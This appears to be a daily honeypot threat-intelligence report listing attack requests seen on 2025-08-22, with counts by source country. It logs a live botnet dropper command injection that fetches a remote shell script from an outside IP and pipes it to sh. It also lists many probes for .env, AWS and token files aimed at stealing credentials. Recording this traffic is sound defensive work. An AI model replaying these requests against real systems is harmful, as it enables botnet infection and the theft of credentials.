Daily Report: 2025-08-22#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).
There are 32 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1050 requests were recorded during the day, originating from 1 different countries, with a peak of 481 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
GB | Germany |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
45.156.87.165 | GET /cgi-bin/script?system%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.epn.sh%7Csh%3B HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
8 | 4 | \x03\x00\x00\x13\x0E\xE0\x00\x00\x00\x00\x00\x01\x00\x08\x00 |
210 | 2 | GET /config.env’ HTTP/1.1 |
211 | 2 | GET /api/.env0.1 HTTP/1.1 |
212 | 2 | GET /78.153/.env HTTP/1.1 |
213 | 2 | GET /api/.env0.2 HTTP/1.1 |
214 | 2 | GET /185.95/.env HTTP/1.1 |
215 | 2 | GET /aws-ses.env HTTP/1.1 |
216 | 2 | GET /aws-sns.env HTTP/1.1 |
217 | 2 | GET /aws/iam.env HTTP/1.1 |
218 | 2 | GET /admin1/.env HTTP/1.1 |
219 | 2 | GET /.system-env HTTP/1.1 |
221 | 2 | GET /Travis/.env HTTP/1.1 |
222 | 2 | GET /api/.env.bk HTTP/1.1 |
223 | 2 | GET /auth/.env.1 HTTP/1.1 |
224 | 2 | GET /auth/.env.2 HTTP/1.1 |
225 | 2 | GET /api/.env.db HTTP/1.1 |
226 | 2 | GET /Videos/.env HTTP/1.1 |
227 | 2 | GET /.env_tokens HTTP/1.1 |
228 | 2 | GET /.env_themes HTTP/1.1 |
245 | 2 | GET /app/.env.db HTTP/1.1 |
246 | 2 | GET /.env_server HTTP/1.1 |
247 | 2 | GET /env/.env.js HTTP/1.1 |
248 | 2 | GET /nextjs/.env HTTP/1.1 |
249 | 2 | GET /dev/.env.db HTTP/1.1 |
250 | 2 | GET /dev/.env.bk HTTP/1.1 |
252 | 2 | GET /env.testing HTTP/1.1 |
254 | 2 | \x03\x00\x00\x13\x0E\xE0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x0F\x00\x00\x00 |
262 | 1 | GET /info.html HTTP/1.1 |
264 | 1 | GET /test.html HTTP/1.1 |
447 | 1 | GET /.rbenv-vars HTTP/1.1 |
483 | 1 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xB5\x0E\xF6\x7F\x00\x00@\xFB7\xA8\x1E\x00\x00\x00\xE0\x81\xDA\x0E\xF6\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
489 | 1 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xB5\x0E\xF6\x7F\x00\x00\x00\xF9\xFE\x86\xDD\x00\x00\x00\xE0\x81\xDA\x0E\xF6\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 481 | GB |
1 | 321 | US |
2 | 82 | BG |
3 | 65 | DE |
4 | 32 | NL |
5 | 11 | SC |
6 | 7 | CN |
7 | 7 | IN |
8 | 5 | ZA |
9 | 4 | BE |
10 | 4 | AE |
11 | 3 | RU |
12 | 3 | KR |
13 | 3 | LT |
14 | 2 | SG |
15 | 2 | VN |
16 | 2 | JP |
17 | 2 | HK |
18 | 2 | UA |
19 | 2 | FR |
20 | 2 | BD |
21 | 1 | CA |
22 | 1 | IR |
23 | 1 | ES |
24 | 1 | BA |
25 | 1 | PA |
26 | 1 | PT |
27 | 1 | TR |
28 | 1 | BR |